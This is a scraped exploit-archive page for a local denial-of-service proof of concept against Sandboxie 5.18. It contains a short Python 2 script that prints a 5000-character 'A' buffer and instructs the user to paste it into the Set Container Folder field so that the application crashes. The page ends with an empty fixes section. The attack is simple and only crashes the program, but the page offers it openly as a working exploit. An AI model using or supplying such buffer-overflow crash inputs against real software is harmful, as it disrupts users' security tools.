Sandboxie 5.18 - Local Denial of Service

2017-05-25 12:05:02

author = '''

##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="257646771455716e14414114160b56494448484057654248444c490b464a48">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> #
##############################################

# Exploit Title: Sandboxie version 5.18 local Dos Exploit
# Date: 2017.05.25
# Exploit Author: Greg Priest
# Version: Sandboxie version 5.18 ... Released on 13 April 2017
# Tested on: Windows7 x64 HUN/ENG Professional
'''

overflow = "A" * 5000

instruction = '''

<1> Copy printed "AAAAA..." string to clipboard!
<2> Sandboxie Control->Sandbox->Set Container Folder
<3> Paste the buffer in the input then press ok
'''

print author
print overflow
print instruction


Fixes

No fixes

In order to submit a new fix you need to be registered.